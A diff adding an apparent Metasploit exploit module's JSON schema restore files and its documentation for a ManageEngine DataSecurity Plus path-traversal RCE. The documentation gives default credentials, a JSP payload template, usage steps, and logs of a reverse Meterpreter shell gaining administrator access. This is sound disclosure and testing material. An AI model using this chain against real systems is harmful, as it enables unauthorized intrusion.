+      "docs_val": true,
+      "type": "text"
+    }},
+    {"USER_NAME": {
+      "docs_val": true,
+      "type": "text"
+    }},
+    {"PRINTER_NAME": {
+      "docs_val": true,
+      "type": "text"
+    }},
+    {"FILENAME": {
+      "docs_val": true,
+      "type": "text"
+    }},
+    {"LOCAL_PATH": {
+      "docs_val": true,
+      "type": "text"
+    }},
+    {"PORT_NAME": {
+      "docs_val": true,
+      "type": "text"
+    }},
+    {"MACHINE_NAME": {
+      "docs_val": true,
+      "type": "text"
+    }},
+    {"PRINTER_USERNAME": {
+      "docs_val": true,
+      "type": "text"
+    }},
+    {"NOTIFY_NAME": {
+      "docs_val": true,
+      "type": "text"
+    }},
+    {"TOTAL_PAGES": {
+      "docs_val": true,
+      "type": "long"
+    }},
+    {"FILE_SIZE": {
+      "docs_val": true,
+      "type": "long"
+    }},
+    {"CREATION_TIME": {
+      "docs_val": true,
+      "type": "long"
+    }},
+    {"CLIENTIPLIST": {
+      "docs_val": true,
+      "type": "text"
+    }},
+    {"PROFILE_ID": {
+      "docs_val": true,
+      "type": "long"
+    }},
+    {"PROFILE_NAME": {
+      "docs_val": true,
+      "type": "text"
+    }}
+  ]
+}}

--- a/data/exploits/manageengine_xnode/CVE-2020-11531/DataSecurityPlus/DspEndpointWebAuditReport_V1.json
+++ b/data/exploits/manageengine_xnode/CVE-2020-11531/DataSecurityPlus/DspEndpointWebAuditReport_V1.json
@@ -1,0 +1,71 @@
+{"mappings": {
+  "range_field": "TIME_GENERATED",
+  "unique_fields": ["UNIQUE_ID"],
+  "default_analyzer": "KEYWORD_LOWERCASE",
+  "field_list": [
+    {"UNIQUE_ID": {
+      "docs_val": true,
+      "type": "long"
+    }},
+    {"TIME_GENERATED": {
+      "docs_val": true,
+      "type": "long"
+    }},
+    {"SOURCE_ID": {
+      "docs_val": true,
+      "type": "long"
+    }},
+    {"ENDPOINT_ID": {
+      "docs_val": true,
+      "type": "long"
+    }},
+    {"ENDPOINT_NAME": {
+      "docs_val": true,
+      "type": "text"
+    }},
+    {"USER_SID": {
+      "docs_val": true,
+      "type": "text"
+    }},
+    {"USER_NAME": {
+      "docs_val": true,
+      "type": "text"
+    }},
+    {"NEW_FILE_NAME": {
+      "docs_val": true,
+      "type": "text"
+    }},
+    {"FILE_SIZE": {
+      "docs_val": true,
+      "type": "long"
+    }},
+    {"FILETYPE_EXTENSION": {
+      "docs_val": true,
+      "type": "text"
+    }},
+    {"PROCESS_NAME": {
+      "docs_val": true,
+      "type": "text"
+    }},
+    {"MESSAGE": {
+      "docs_val": true,
+      "type": "text"
+    }},
+    {"URL": {
+      "docs_valO": true,
+      "type": "text"
+    }},
+    {"CLIENT_IP": {
+      "docs_val": true,
+      "type": "text"
+    }},
+    {"PROFILE_ID": {
+      "docs_val": true,
+      "type": "long"
+    }},
+    {"PROFILE_NAME": {
+      "docs_val": true,
+      "type": "text"
+    }}
+  ]
+}}

--- a/data/exploits/manageengine_xnode/CVE-2020-11531/DataSecurityPlus/FAMetadataReport_V1.json
+++ b/data/exploits/manageengine_xnode/CVE-2020-11531/DataSecurityPlus/FAMetadataReport_V1.json
@@ -1,0 +1,128 @@
+{"mappings": {
+  "range_field": "UNIQUE_ID",
+  "unique_fields": ["UNIQUE_ID"],
+  "default_analyzer": "KEYWORD_LOWERCASE",
+  "field_list": [
+    {"UNIQUE_ID": {
+      "docs_val": true,
+      "type": "long"
+    }},
+    {"FILE_ID": {
+      "docs_val": true,
+      "type": "text"
+    }},
+    {"PARENT_ID": {
+      "docs_val": true,
+      "type": "long"
+    }},
+    {"DRIVE_LETTER": {
+      "docs_val": true,
+      "type": "text"
+    }},
+    {"SERVER_ID": {
+      "docs_val": true,
+      "type": "long"
+    }},
+    {"DOMAIN_ID": {
+      "docs_val": true,
+      "type": "long"
+    }},
+    {"SERVERNAME": {
+      "docs_val": true,
+      "type": "text"
+    }},
+    {"REPORT_GENERATION_ID": {
+      "docs_val": true,
+      "type": "long"
+    }},
+    {"LAST_ACCESS_TIME": {
+      "docs_val": true,
+      "type": "long"
+    }},
+    {"LAST_WRITE_TIME": {
+      "docs_val": true,
+      "type": "long"
+    }},
+    {"CREATION_TIME": {
+      "docs_val": true,
+      "type": "long"
+    }},
+    {"FILE_ATTRIBUTES": {
+      "docs_val": true,
+      "type": "text"
+    }},
+    {"SECURITY_ID": {
+      "docs_val": true,
+      "type": "long"
+    }},
+    {"FILE_OWNER": {
+      "docs_val": true,
+      "type": "text"
+    }},
+    {"OWNER_SID": {
+      "docs_val": true,
+      "type": "text"
+    }},
+    {"FILE_FOLDER_NAME": {
+      "docs_val": true,
+      "type": "text"
+    }},
+    {"LOCAL_PATH": {
+      "docs_val": true,
+      "type": "text"
+    }},
+    {"FILE_SIZE": {
+      "docs_val": true,
+      "type": "long"
+    }},
+    {"FILETYPE_EXTENSION": {
+      "docs_val": true,
+      "type": "text"
+    }},
+    {"IS_HIDDEN": {
+      "docs_val": true,
+      "type": "text"
+    }},
+    {"NON_BUSINESS_FILE": {
+      "docs_val": true,
+      "type": "text"
+    }},
+    {"FILETYPE_EXTENSION_CATEGORY": {
+      "docs_val": true,
+      "type": "text"
+    }},
+    {"IS_DIRECTORY": {
+      "docs_val": true,
+      "type": "text"
+    }},
+    {"YEAR_CREATED": {
+      "docs_val": true,
+      "type": "long"
+    }},
+    {"IS_STALE": {
+      "docs_val": true,
+      "type": "text"
+    }},
+    {"RULE_CRITERIA": {
+      "analyzer": "WHITESPACE_LOWERCASE",
+      "docs_val": true,
+      "type": "text"
+    }},
+    {"SECURITY_UNIQUE_KEY": {
+      "docs_val": true,
+      "type": "text"
+    }},
+    {"NODE_INDEX": {
+      "docs_val": true,
+      "type": "long"
+    }},
+    {"IS_EXCESSIVE": {
+      "docs_val": true,
+      "type": "text"
+    }},
+    {"BLOCKED_INHERITANCE": {
+      "docs_val": true,
+      "type": "text"
+    }}
+  ]
+}}

--- a/data/exploits/manageengine_xnode/CVE-2020-11531/DataSecurityPlus/FASecurityDescriptorReport_V1.json
+++ b/data/exploits/manageengine_xnode/CVE-2020-11531/DataSecurityPlus/FASecurityDescriptorReport_V1.json
@@ -1,0 +1,77 @@
+{"mappings": {
+  "range_field": "UNIQUE_ID",
+  "unique_fields": ["UNIQUE_ID"],
+  "default_analyzer": "KEYWORD_LOWERCASE",
+  "field_list": [
+    {"UNIQUE_ID": {
+      "docs_val": true,
+      "type": "long"
+    }},
+    {"SECURITY_ID": {
+      "docs_val": true,
+      "type": "long"
+    }},
+    {"SERVER_ID": {
+      "docs_val": true,
+      "type": "long"
+    }},
+    {"SOURCE_ID": {
+      "docs_val": true,
+      "type": "long"
+    }},
+    {"SERVERNAME": {
+      "docs_val": true,
+      "type": "text"
+    }},
+    {"DRIVE_LETTER": {
+      "docs_val": true,
+      "type": "text"
+    }},
+    {"REPORT_GENERATION_ID": {
+      "docs_val": true,
+      "type": "long"
+    }},
+    {"FILE_OWNER": {
+      "docs_val": true,
+      "type": "text"
+    }},
+    {"OWNER_SID": {
+      "docs_val": true,
+      "type": "text"
+    }},
+    {"PRIMARY_GROUP": {
+      "docs_val": true,
+      "type": "text"
+    }},
+    {"DACL": {
+      "analyzer": "ACL_JSON_LOWERCASE",
+      "docs_val": true,
+      "type": "text"
+    }},
+    {"SACL": {
+      "docs_val": true,
+      "type": "text"
+    }},
+    {"BLOCKED_INHERITANCE": {
+      "docs_val": true,
+      "type": "text"
+    }},
+    {"SD_CONTROL": {
+      "docs_val": true,
+      "type": "text"
+    }},
+    {"IS_EXCESSIVE": {
+      "docs_val": true,
+      "type": "text"
+    }},
+    {"RULE_CRITERIA": {
+      "analyzer": "WHITESPACE_LOWERCASE",
+      "docs_val": true,
+      "type": "text"
+    }},
+    {"SECURITY_UNIQUE_KEY": {
+      "docs_val": true,
+      "type": "text"
+    }}
+  ]
+}}

--- a/data/exploits/manageengine_xnode/CVE-2020-11531/DataSecurityPlus/FapDiskUsageReport_V1.json
+++ b/data/exploits/manageengine_xnode/CVE-2020-11531/DataSecurityPlus/FapDiskUsageReport_V1.json
@@ -1,0 +1,59 @@
+{"mappings": {
+  "range_field": "UNIQUE_ID",
+  "unique_fields": ["UNIQUE_ID"],
+  "default_analyzer": "KEYWORD_LOWERCASE",
+  "field_list": [
+    {"UNIQUE_ID": {
+      "docs_val": true,
+      "type": "long"
+    }},
+    {"REPORT_GENERATION_ID": {
+      "docs_val": true,
+      "type": "long"
+    }},
+    {"SOURCE_ID": {
+      "docs_val": true,
+      "type": "long"
+    }},
+    {"SERVER_ID": {
+      "docs_val": true,
+      "type": "long"
+    }},
+    {"SERVERNAME": {
+      "docs_val": true,
+      "type": "text"
+    }},
+    {"DATE": {
+      "docs_val": true,
+      "type": "text"
+    }},
+    {"DRIVE": {
+      "docs_val": true,
+      "type": "text"
+    }},
+    {"DRIVE_NAME": {
+      "docs_val": true,
+      "type": "text"
+    }},
+    {"FILE_SYSTEM": {
+      "docs_val": true,
+      "type": "text"
+    }},
+    {"TOTAL_SPACE": {
+      "docs_val": true,
+      "type": "long"
+    }},
+    {"USED_SPACE": {
+      "docs_val": true,
+      "type": "long"
+    }},
+    {"FREE_SPACE": {
+      "docs_val": true,
+      "type": "long"
+    }},
+    {"DAY": {
+      "docs_val": true,
+      "type": "long"
+    }}
+  ]
+}}

--- a/data/exploits/manageengine_xnode/CVE-2020-11531/DataSecurityPlus/FapDuplicateFilesReport_V1.json
+++ b/data/exploits/manageengine_xnode/CVE-2020-11531/DataSecurityPlus/FapDuplicateFilesReport_V1.json
@@ -1,0 +1,67 @@
+{"mappings": {
+  "range_field": "UNIQUE_ID",
+  "unique_fields": ["UNIQUE_ID"],
+  "default_analyzer": "KEYWORD_LOWERCASE",
+  "field_list": [
+    {"UNIQUE_ID": {
+      "docs_val": true,
+      "type": "long"
+    }},
+    {"REPORT_GENERATION_ID": {
+      "docs_val": true,
+      "type": "long"
+    }},
+    {"SERVER_ID": {
+      "docs_val": true,
+      "type": "long"
+    }},
+    {"SOURCE_ID": {
+      "docs_val": true,
+      "type": "long"
+    }},
+    {"SERVERNAME": {
+      "docs_val": true,
+      "type": "text"
+    }},
+    {"FILE_SIZE": {
+      "docs_val": true,
+      "type": "long"
+    }},
+    {"FILE_FOLDER_NAME": {
+      "docs_val": true,
+      "type": "text"
+    }},
+    {"FILETYPE_EXTENSION": {
+      "docs_val": true,
+      "type": "text"
+    }},
+    {"GROUP_ID": {
+      "docs_val": true,
+      "type": "long"
+    }},
+    {"LAST_WRITE_TIME": {
+      "docs_val": true,
+      "type": "long"
+    }},
+    {"CREATION_TIME": {
+      "docs_val": true,
+      "type": "long"
+    }},
+    {"TO_SHOW": {
+      "docs_val": true,
+      "type": "long"
+    }},
+    {"YEAR_CREATED": {
+      "docs_val": true,
+      "type": "long"
+    }},
+    {"DRIVE_LETTER": {
+      "docs_val": true,
+      "type": "text"
+    }},
+    {"TOTAL_FILES": {
+      "docs_val": true,
+      "type": "long"
+    }}
+  ]
+}}

--- a/data/exploits/manageengine_xnode/CVE-2020-11531/DataSecurityPlus/FapFileFolderProperties_V1.json
+++ b/data/exploits/manageengine_xnode/CVE-2020-11531/DataSecurityPlus/FapFileFolderProperties_V1.json
@@ -1,0 +1,95 @@
+{"mappings": {
+  "range_field": "UNIQUE_ID",
+  "unique_fields": ["UNIQUE_ID"],
+  "default_analyzer": "KEYWORD_LOWERCASE",
+  "field_list": [
+    {"UNIQUE_ID": {
+      "docs_val": true,
+      "type": "long"
+    }},
+    {"SERVER_ID": {
+      "docs_val": true,
+      "type": "long"
+    }},
+    {"SOURCE_ID": {
+      "docs_val": true,
+      "type": "long"
+    }},
+    {"SERVERNAME": {
+      "docs_val": true,
+      "type": "text"
+    }},
+    {"REPORT_GENERATION_ID": {
+      "docs_val": true,
+      "type": "long"
+    }},
+    {"OBJECT_ID": {
+      "docs_val": true,
+      "type": "long"
+    }},
+    {"OBJECT_NAME": {
+      "docs_val": true,
+      "type": "text"
+    }},
+    {"UNC_NAME": {
+      "docs_val": true,
+      "type": "text"
+    }},
+    {"FILE_OWNER": {
+      "docs_val": true,
+      "type": "text"
+    }},
+    {"INHERITANCE": {
+      "docs_val": true,
+      "type": "text"
+    }},
+    {"OBJECT_TYPE": {
+      "docs_val": true,
+      "type": "text"
+    }},
+    {"SECURITY_PERMISSIONS": {
+      "analyzer": "WHITESPACE_LOWERCASE",
+      "type": "text"
+    }},
+    {"SHARE_PERMISSIONS": {
+      "analyzer": "WHITESPACE_LOWERCASE",
+      "type": "text"
+    }},
+    {"SIZE": {
+      "docs_val": true,
+      "type": "long"
+    }},
+    {"FILE_COUNT": {
+      "docs_val": true,
+      "type": "long"
+    }},
+    {"DIRECTORY_COUNT": {
+      "docs_val": true,
+      "type": "long"
+    }},
+    {"LAST_ACCESS_TIME": {
+      "docs_val": true,
+      "type": "long"
+    }},
+    {"CREATION_TIME": {
+      "docs_val": true,
+      "type": "long"
+    }},
+    {"LAST_WRITE_TIME": {
+      "docs_val": true,
+      "type": "long"
+    }},
+    {"FILE_FOLDER_ATTRIBUTES": {
+      "docs_val": true,
+      "type": "long"
+    }},
+    {"OTHERINFO_1": {
+      "docs_val": true,
+      "type": "text"
+    }},
+    {"OTHERINFO_2": {
+      "docs_val": true,
+      "type": "text"
+    }}
+  ]
+}}

--- a/data/exploits/manageengine_xnode/CVE-2020-11531/DataSecurityPlus/FapFileInfoReport_V1.json
+++ b/data/exploits/manageengine_xnode/CVE-2020-11531/DataSecurityPlus/FapFileInfoReport_V1.json
@@ -1,0 +1,91 @@
+{"mappings": {
+  "range_field": "UNIQUE_ID",
+  "unique_fields": ["UNIQUE_ID"],
+  "default_analyzer": "KEYWORD_LOWERCASE",
+  "field_list": [
+    {"UNIQUE_ID": {
+      "docs_val": true,
+      "type": "long"
+    }},
+    {"SERVER_ID": {
+      "docs_val": true,
+      "type": "long"
+    }},
+    {"SOURCE_ID": {
+      "docs_val": true,
+      "type": "long"
+    }},
+    {"SERVERNAME": {
+      "docs_val": true,
+      "type": "text"
+    }},
+    {"REPORT_GENERATION_ID": {
+      "docs_val": true,
+      "type": "long"
+    }},
+    {"REPORT_ID": {
+      "docs_val": true,
+      "type": "long"
+    }},
+    {"LAST_ACCESS_TIME": {
+      "docs_val": true,
+      "type": "long"
+    }},
+    {"LAST_WRITE_TIME": {
+      "docs_val": true,
+      "type": "long"
+    }},
+    {"CREATION_TIME": {
+      "docs_val": true,
+      "type": "long"
+    }},
+    {"FILE_ATTRIBUTES": {
+      "docs_val": true,
+      "type": "text"
+    }},
+    {"FILE_FOLDER_NAME": {
+      "docs_val": true,
+      "type": "text"
+    }},
+    {"FILE_OWNER": {
+      "docs_val": true,
+      "type": "text"
+    }},
+    {"OWNER_SID": {
+      "docs_val": true,
+      "type": "text"
+    }},
+    {"LOCAL_PATH": {
+      "docs_val": true,
+      "type": "text"
+    }},
+    {"SHARE_PATH": {
+      "docs_val": true,
+      "type": "text"
+    }},
+    {"SHARE_ID": {
+      "docs_val": true,
+      "type": "long"
+    }},
+    {"FILE_SIZE": {
+      "docs_val": true,
+      "type": "long"
+    }},
+    {"FILETYPE_EXTENSION": {
+      "docs_val": true,
+      "type": "text"
+    }},
+    {"IS_HIDDEN": {
+      "docs_val": true,
+      "type": "text"
+    }},
+    {"MEDIA_FILE": {
+      "docs_val": true,
+      "type": "text"
+    }},
+    {"FILETYPE_EXTENSION_CATEGORY": {
+      "docs_val": true,
+      "type": "text"
+    }}
+  ]
+}}

--- a/data/exploits/manageengine_xnode/CVE-2020-11531/DataSecurityPlus/RAAlertHistory_V1.json
+++ b/data/exploits/manageengine_xnode/CVE-2020-11531/DataSecurityPlus/RAAlertHistory_V1.json
@@ -1,0 +1,56 @@
+{"mappings": {
+  "time_field": "TIME_GENERATED",
+  "range_field": "TIME_GENERATED",
+  "unique_fields": ["INCIDENT_ID"],
+  "default_analyzer": "KEYWORD_LOWERCASE",
+  "field_list": [
+    {"INCIDENT_ID": {
+      "docs_val": true,
+      "type": "long"
+    }},
+    {"FILE_NAME": {
+      "docs_val": true,
+      "type": "text"
+    }},
+    {"FILE_TYPE": {
+      "docs_val": true,
+      "type": "text"
+    }},
+    {"LOCATION": {
+      "docs_val": true,
+      "type": "text"
+    }},
+    {"SERVER_NAME": {
+      "docs_val": true,
+      "type": "text"
+    }},
+    {"POLICY_ID": {
+      "docs_val": true,
+      "type": "long"
+    }},
+    {"POLICY_NAME": {
+      "docs_val": true,
+      "type": "text"
+    }},
+    {"TIME_GENERATED": {
+      "docs_val": true,
+      "type": "long"
+    }},
+    {"NO_OF_OCCURRENCES": {
+      "docs_val": true,
+      "type": "long"
+    }},
+    {"FILE_OWNER": {
+      "docs_val": true,
+      "type": "text"
+    }},
+    {"DATA_SOURCE": {
+      "docs_val": true,
+      "type": "long"
+    }},
+    {"RISK_SCORE": {
+      "docs_val": true,
+      "type": "long"
+    }}
+  ]
+}}

--- a/data/exploits/manageengine_xnode/CVE-2020-11531/DataSecurityPlus/RAEntityDetails_V1.json
+++ b/data/exploits/manageengine_xnode/CVE-2020-11531/DataSecurityPlus/RAEntityDetails_V1.json
@@ -1,0 +1,40 @@
+{"mappings": {
+  "time_field": "TIME_GENERATED",
+  "range_field": "TIME_GENERATED",
+  "unique_fields": ["INCIDENT_ID"],
+  "default_analyzer": "KEYWORD_LOWERCASE",
+  "field_list": [
+    {"NAME": {
+      "docs_val": true,
+      "type": "text"
+    }},
+    {"LOCATION": {
+      "docs_val": true,
+      "type": "text"
+    }},
+    {"ROOT": {
+      "docs_val": true,
+      "type": "text"
+    }},
+    {"SIZE": {
+      "docs_val": true,
+      "type": "long"
+    }},
+    {"NO_OF_OCCURRENCES": {
+      "docs_val": true,
+      "type": "long"
+    }},
+    {"IS_VIOLATED": {
+      "docs_val": true,
+      "type": "text"
+    }},
+    {"INCIDENT_RAISED": {
+      "docs_val": true,
+      "type": "text"
+    }},
+    {"IS_RISKY": {
+      "docs_val": true,
+      "type": "text"
+    }}
+  ]
+}}

--- a/data/exploits/manageengine_xnode/CVE-2020-11531/DataSecurityPlus/RAIncidents_V1.json
+++ b/data/exploits/manageengine_xnode/CVE-2020-11531/DataSecurityPlus/RAIncidents_V1.json
@@ -1,0 +1,84 @@
+{"mappings": {
+  "time_field": "TIME_GENERATED",
+  "range_field": "TIME_GENERATED",
+  "unique_fields": ["INCIDENT_ID"],
+  "default_analyzer": "KEYWORD_LOWERCASE",
+  "field_list": [
+    {"INCIDENT_ID": {
+      "docs_val": true,
+      "type": "long"
+    }},
+    {"FILE_NAME": {
+      "docs_val": true,
+      "type": "text"
+    }},
+    {"FILE_TYPE": {
+      "docs_val": true,
+      "type": "text"
+    }},
+    {"LOCATION": {
+      "docs_val": true,
+      "type": "text"
+    }},
+    {"SERVER_NAME": {
+      "docs_val": true,
+      "type": "text"
+    }},
+    {"POLICY_ID": {
+      "docs_val": true,
+      "type": "long"
+    }},
+    {"POLICY_NAME": {
+      "docs_val": true,
+      "type": "text"
+    }},
+    {"TIME_GENERATED": {
+      "docs_val": true,
+      "type": "long"
+    }},
+    {"NO_OF_OCCURRENCES": {
+      "docs_val": true,
+      "type": "long"
+    }},
+    {"FILE_OWNER": {
+      "docs_val": true,
+      "type": "text"
+    }},
+    {"DATA_SOURCE": {
+      "docs_val": true,
+      "type": "long"
+    }},
+    {"RAISED_INCIDENT": {
+      "docs_val": true,
+      "type": "text"
+    }},
+    {"RISK_SCORE": {
+      "docs_val": true,
+      "type": "long"
+    }},
+    {"VIOLATION_SCORE": {
+      "docs_val": true,
+      "type": "long"
+    }},
+    {"POLICY_SCORE": {
+      "docs_val": true,
+      "type": "long"
+    }},
+    {"PERMISSION_SCORE": {
+      "docs_val": true,
+      "type": "long"
+    }},
+    {"AUDIT_SCORE": {
+      "docs_val": true,
+      "type": "long"
+    }},
+    {"USER_SCORE": {
+      "docs_val": true,
+      "type": "long"
+    }},
+    {"SCORE_DESCRIPTION": {
+      "docs_val": true,
+      "type": "text"
+    }}
+  ]
+}}

--- a/data/exploits/manageengine_xnode/CVE-2020-11531/DataSecurityPlus/RAViolationRecords_V1.json
+++ b/data/exploits/manageengine_xnode/CVE-2020-11531/DataSecurityPlus/RAViolationRecords_V1.json
@@ -1,0 +1,31 @@
+{"mappings": {
+  "time_field": "INCIDENT_ID",
+  "range_field": "INCIDENT_ID",
+  "default_analyzer": "KEYWORD_LOWERCASE",
+  "field_list": [
+    {"INCIDENT_ID": {
+      "docs_val": true,
+      "type": "long"
+    }},
+    {"TIME_GENERATED": {
+      "docs_val": true,
+      "type": "long"
+    }},
+    {"RULE_ID": {
+      "docs_val": true,
+      "type": "long"
+    }},
+    {"RULE_NAME": {
+      "docs_val": true,
+      "type": "text"
+    }},
+    {"VIOLATION_TEXT": {
+      "docs_val": true,
+      "type": "text"
+    }},
+    {"DISPLAY_TEXT": {
+      "docs_val": true,
+      "type": "text"
+    }}
+  ]
+}}

--- a/documentation/modules/exploit/windows/http/manageengine_datasecurity_plus_traversal_rce.md
+++ b/documentation/modules/exploit/windows/http/manageengine_datasecurity_plus_traversal_rce.md
@@ -1,0 +1,219 @@
+## Vulnerable Application
+This module exploits default credentials (CVE-2020-11532) and a path traversal vulnerability (CVE-2020-11531)
+in the DataEngine Xnode server in ManageEngine DataSecurity Plus versions prior to 6.0.1 (6011).
+These issues are chained in order to achieve remote code execution with local administrator privileges.
+
+The module first tries to authenticate to the Xnode server using default credentials. If this works, it then requests the Xnode version.
+If the target seems vulnerable based on the presence of default credentials and the Xnode version,
+the module sends a custom `dr:/dr_schema_sync` action request to the Xnode server that exploits a path traversal vulnerability.
+
+The `dr:/dr_schema_sync` action can be used to update the data repository (database) schema information that is stored in several JSON files
+in the `<install_dir>\apps\dataengine-xnode\conf\datarepository\schema\` directory.
+A valid `dr:/dr_schema_sync` request takes the form of a JSON hash (like all Xnode actions), containing a `dr_schema_list` key.
+The value for this key is also a hash, which has as its keys the names of the data repository schema files,
+and as its values, the contents of those JSON files.
+For each schema filename, Xnode will open that file, or create it if it doesn't exist, and write the contents to it.
+
+The vulnerability here is that the filenames can include directory traversal sequences like `..\`,
+which makes it possible to write a file to directories other than `schema`, such as the web root at `<install_dir>\webapps\fap\`.
+In addition, any file extension is allowed, including JSP.
+
+The module exploits this issue by doing exactly that, namely exploiting the directory traversal vector to write a JSP file to the web root.
+However, the file contents must be valid JSON, which limits the methods of delivering the payload.
+The module overcomes this by following the PoC in delivering a payload as a byte array,
+which is then converted to a string and passed to a `Runtime.getRuntime().exec()` call.
+This sequence is written on a single line and wrapped in JSP scriptlet tags and then in quotes to make it valid JSON, like so:
+`"<% Runtime.getRuntime().exec(new String(new byte[] {#{payload}})); %>"`
+This initial payload is triggered via a simple HTTP GET request to the JSP file.
+
+While this approach avoids the payload containing characters that require escaping in JSON, it is incompatible with
+standard msf payloads and is also not a good match for command stagers, since it would result in the creation of
+a great number of JSP files on the target.
+The module therefore uses code from the `web_delivery` msf module to trigger delivery of the final payload via
+a single, short command leveraging either PowerShell or Regsvr32, depending on the module configuration.
+
+This module has been successfully tested against ManageEngine DataSecurity Plus version 6.0.1 (6010) running on Windows Server 2012.
+
+## Installation Information
+Please DM @wyntererik for information on how to obtain and install vulnerable software for testing.
+
+## Verification Steps
+1. Start msfconsole
+2. Do: `use exploit/windows/http/manageengine_datasecurity_plus_traversal_rce`
+3. Do: `set RHOSTS [IP]`
+4. Do: `set LHOST [IP]`
+5. Do: `set SRVHOST [IP]`
+6. Do: `exploit`
+
+## Options
+### CUSTOM_PAYLOAD
+Enable use of payloads other than `windows/x64/meterpreter/reverse_*`.
+This option is disabled by default because during testing only `windows/x64/meterpreter/reverse_*` payloads resulted in a shell.
+### RESTORE_SCHEMA_DIR
+Upon successful exploitation, repopulate `<install_dir>\apps\dataengine-xnode\conf\datarepository\schema` with the default JSON files
+### WEB_DELIVERY_VIA_PSH
+If enabled (default), the module will use only Powershell (in memory) to deliver the payload.
+If disabled, the Regsvr32 web delivery method is used.
+
+## Scenarios
+### ManageEngine DataSecurity Plus 6.0.1 (6010) on Windows Server 2012 - WEB_DELIVERY_VIA_PSH => true
+```
+msf6 > use exploit/windows/http/manageengine_datasecurity_plus_traversal_rce
+[*] Using configured payload windows/x64/meterpreter/reverse_tcp
+msf6 exploit(windows/http/manageengine_datasecurity_plus_traversal_rce) > set rhosts 192.168.1.225
+rhosts => 192.168.1.225
+msf6 exploit(windows/http/manageengine_datasecurity_plus_traversal_rce) > options 
+
+Module options (exploit/windows/http/manageengine_datasecurity_plus_traversal_rce):
+
+   Name                  Current Setting  Required  Description
+   ----                  ---------------  --------  -----------
+   CUSTOM_PAYLOAD        false            no        Enable use of payloads other than windows/x64/meterpreter/reverse_*
+   PASSWORD              chegan           yes       Password used to authenticate to the Xnode server
+   Proxies                                no        A proxy chain of format type:host:port[,type:host:port][...]
+   RESTORE_SCHEMA_DIR    true             no        Upon successful exploitation, repopulate <datasecurity_install_dir>\apps\dataengine-xnode\conf\datarepository\schema with the default JSON files
+   RHOSTS                192.168.1.225    yes       The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit
+   RPORT                 8800             yes       The target port (TCP)
+   SRVHOST               0.0.0.0          yes       The local host or network interface to listen on. This must be an address on the local machine or 0.0.0.0 to listen on all addresses.
+   SRVPORT               8080             yes       The local port to listen on.
+   SSL                   false            no        Negotiate SSL/TLS for outgoing connections
+   SSLCert                                no        Path to a custom SSL certificate (default is randomly generated)
+   URIPATH                                no        The URI to use for this exploit (default is random)
+   USERNAME              atom             yes       Username used to authenticate to the Xnode server
+   VHOST                                  no        HTTP server virtual host
+   WEB_DELIVERY_VIA_PSH  true             yes       If enabled (default), the module will use only Powershell (in memory) to deliver the payload. If disabled, the Regsvr32 web delivery method is used
+   XNODE_PORT            29119            yes       The Xnode port
+
+
+Payload options (windows/x64/meterpreter/reverse_tcp):
+
+   Name      Current Setting  Required  Description
+   ----      ---------------  --------  -----------
+   EXITFUNC  process          yes       Exit technique (Accepted: '', seh, thread, process, none)
+   LHOST     192.168.1.128    yes       The listen address (an interface may be specified)
+   LPORT     4444             yes       The listen port
+
+
+Exploit target:
+
+   Id  Name
+   --  ----
+   0   DataSecurity Plus
+
+msf6 exploit(windows/http/manageengine_datasecurity_plus_traversal_rce) > run
+[*] Exploit running as background job 4.
+[*] Exploit completed, but no session was created.
+
+[*] Started reverse TCP handler on 192.168.1.128:4444 
+[*] Running automatic check ("set AutoCheck false" to disable)
+msf6 exploit(windows/http/manageengine_datasecurity_plus_traversal_rce) > 
+[+] Successfully authenticated to the Xnode server
+[*] Obtained Xnode installation path: 'C:\Program Files (x86)\ManageEngine\DataSecurity Plus\apps\dataengine-xnode'.
+[+] The target appears to be vulnerable. Target is running Xnode version: XNODE_1_0_0
+[*] Using URL: http://192.168.1.128:8080/UdYqreK
+[*] Server started.
+[*] Obtained expected Xnode "de_healh" status: "GREEN".
+
+[!] This exploit will wipe the contents in the <datasecurity_install_dir>\apps\dataengine-xnode\conf\datarepository\schema directory.
+[!] If that directory remains empty, Xnode will stop working and it will not be possible to reboot DataSecurity Plus.
+[!] This module will try to repopulate the directory with the default JSON files, but that may impact functionality for a non-default configuration.
+[*] Requesting JSP payload: http://192.168.1.225:8800/swkncbljpmmw.jsp
+[+] Successfully requested JSP payload
+[*] 192.168.1.225   manageengine_datasecurity_plus_traversal_rce - Delivering Payload (3675 bytes)
+[*] Sending stage (200774 bytes) to 192.168.1.225
+[+] We got a session! Please be patient while cleanpup is performed. This may take a while.
+[*] Server stopped.
+[+] Successfully removed the JSP payload from C:\Program Files (x86)\ManageEngine\DataSecurity Plus\webapps\fap\swkncbljpmmw.jsp.
+[*] Attempting to repopulate apps\dataengine-xnode\conf\datarepository\schema with the default JSON files.
+[+] Successfully uploaded the default Xnode datarepostiory schema files.
+[*] Meterpreter session 5 opened (192.168.1.128:4444 -> 192.168.1.225:40192) at 2022-06-10 12:46:40 -0400
+
+msf6 exploit(windows/http/manageengine_datasecurity_plus_traversal_rce) > sessions 5
+[*] Starting interaction with 5...
+
+meterpreter > shell
+Process 2160 created.
+Channel 29 created.
+Microsoft Windows [Version 6.3.9600]
+(c) 2013 Microsoft Corporation. All rights reserved.
+
+C:\Program Files (x86)\ManageEngine\DataSecurity Plus\bin>whoami
+whoami
+lies\administrator
+```
+### ManageEngine DataSecurity Plus 6.0.1 (6010) on Windows Server 2012 - WEB_DELIVERY_VIA_PSH => false
+```
+msf6 exploit(windows/http/manageengine_datasecurity_plus_traversal_rce) > options 
+
+Module options (exploit/windows/http/manageengine_datasecurity_plus_traversal_rce):
+
+   Name                  Current Setting  Required  Description
+   ----                  ---------------  --------  -----------
+   CUSTOM_PAYLOAD        false            no        Enable use of payloads other than windows/x64/meterpreter/reverse_*
+   PASSWORD              chegan           yes       Password used to authenticate to the Xnode server
+   Proxies                                no        A proxy chain of format type:host:port[,type:host:port][...]
+   RESTORE_SCHEMA_DIR    true             no        Upon successful exploitation, repopulate <datasecurity_install_dir>\apps\dataengine-xnode\conf\datarepository\schema with the default JSON files
+   RHOSTS                192.168.1.225    yes       The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit
+   RPORT                 8800             yes       The target port (TCP)
+   SRVHOST               0.0.0.0          yes       The local host or network interface to listen on. This must be an address on the local machine or 0.0.0.0 to listen on all addresses.
+   SRVPORT               8080             yes       The local port to listen on.
+   SSL                   false            no        Negotiate SSL/TLS for outgoing connections
+   SSLCert                                no        Path to a custom SSL certificate (default is randomly generated)
+   URIPATH                                no        The URI to use for this exploit (default is random)
+   USERNAME              atom             yes       Username used to authenticate to the Xnode server
+   VHOST                                  no        HTTP server virtual host
